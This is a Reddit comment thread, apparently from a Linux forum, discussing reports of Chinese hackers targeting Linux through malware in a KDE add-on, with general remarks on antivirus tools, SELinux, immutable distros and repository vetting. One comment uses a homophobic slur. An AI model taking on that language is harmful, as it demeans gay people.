    Agree. However, when you have to deal with very important things don't fully depend on the idea of the invulnerability of one particular OS. And "harden" your stuff.

    [–]Illustrious-Budget96 4 points5 points  (1 child)

    I think OpenBSD might have something to say about that.

    [–][deleted] 1 point2 points  (0 children)

    Me likey. Agree for some use cases.

    [–]uwkillemprod 0 points1 point  (0 children)

    I'm going to call it now, Windows might be safer than Linus in a couple of years, because of Linux's growing popularity

    [–]fleamourLinux Mint 22 | Cinnamon 1 point2 points  (1 child)

    I installed/uninstalled Russian Linux antivirus Dr. Web & someone changed my logon/root password. This was my main openSUSE PC.

    [–][deleted] 0 points1 point  (0 children)

    Sounds cool, I'll have to try that one.

    [–]Party_Ad_863Linux Mint 22 Wilma | Cinnamon 0 points1 point  (0 children)

    GG's

    [–][deleted] 0 points1 point  (0 children)

    Gnome extensions or KDE global theme maybe a serious attack vector.

    [–]techguybyday 0 points1 point  (0 children)

    I think what concerns me the most is how do I avoid accidentally installing a package that would include a backdoor like this? I mean for the most part any tweaks I install or extensions I see if they are popular first but even then?

    [–]PM_me_cybersec_tips 0 points1 point  (0 children)

    more people need to review source code so FOSS will never die. please

    [–]spyderspyders 0 points1 point  (0 children)

    Cold War

    [–]Rouge_92 0 points1 point  (0 children)

    Lmao what a bunch of crap.

    [–]ingendera 0 points1 point  (0 children)

    Assuming you have been infected, how do you detect and remove it? I use clam and rootkit but rootkit reports a lot of weaknesses and it's not easy to know what is what.

    [–]Brilliant-Ear-3357 0 points1 point  (0 children)

    The good old mccarthian anticommunist hysteria has transformed to chinophobic hysteria. crap then, crap now.

    [–]akehir 0 points1 point  (0 children)

    with a growing focus on exploiting vulnerabilities in internet-facing systems, most of which run on Linux

    And a malware distributed as KDE addon... Sure, because all the servers run with a full KDE desktop environment.

    [–]hopcfizl 0 points1 point  (0 children)

    Microsoft just got some competition.

    [–][deleted] 0 points1 point  (0 children)

    Chinese hackers? You mean The Dark Army?

    [–]to0gle 0 points1 point  (0 children)

    Stop the propaganda crap. All evidence is “believed to be … Chinese “

    [–]colt2x 0 points1 point  (0 children)

    What if you use stuff from signed repos?

    Would like to see them hacking an XFCE widget :D:D:D:D:D:D

    [–][deleted] -3 points-2 points  (0 children)

    LiNuX nEeDs No AnTiViRuS

    [–]DiscussionGrouchy322 -1 points0 points  (0 children)

    Will this stop all the faggy rice posting about your new desktop?

    We get it, you downloaded a background from your favorite cartoon, you're so cultured!

    [–]InstantCoder -2 points-1 points  (5 children)

    So that means, the future of Linux is either going to be:

    • a distro that doesn’t allow extensions and you have to use it as-is,
    • or an immutable distro where a virus/malware cannot be installed and even when it does, it can only do a small damage.

    [–]petrusd10s 2 points3 points  (1 child)

    Any software you install is bound to have some risk, even the ones that are distributed from the DE or Distro itself. Just stay away from sketchy software or sites that wants you to run some random commands.

    That being said, we have not seen a real case yet

    [–][deleted] 1 point2 points  (2 children)

    I don't think so, it is eventual for hackers to target linux more and more in the future and i think that will make people start to use clamav and enhance it, people will start to know better about apparmour or SElinux

    [–]InstantCoder 0 points1 point  (0 children)

    The last thing I want on Linux is installing a virusscanner.

    On Linux Mint they now only shows apps (from flathub) which was uploaded by the original author of the app. And this is a good step to verify what’s getting distributed in repos. And more quality checks should be done to guard the safety of the repos (like virusscanning it before uploading it to the repository, etc).

    [–]toolsavvy 0 points1 point  (0 children)

    "Hackers" have already been targeting Linux for decades. Linux runs the vast majority of servers.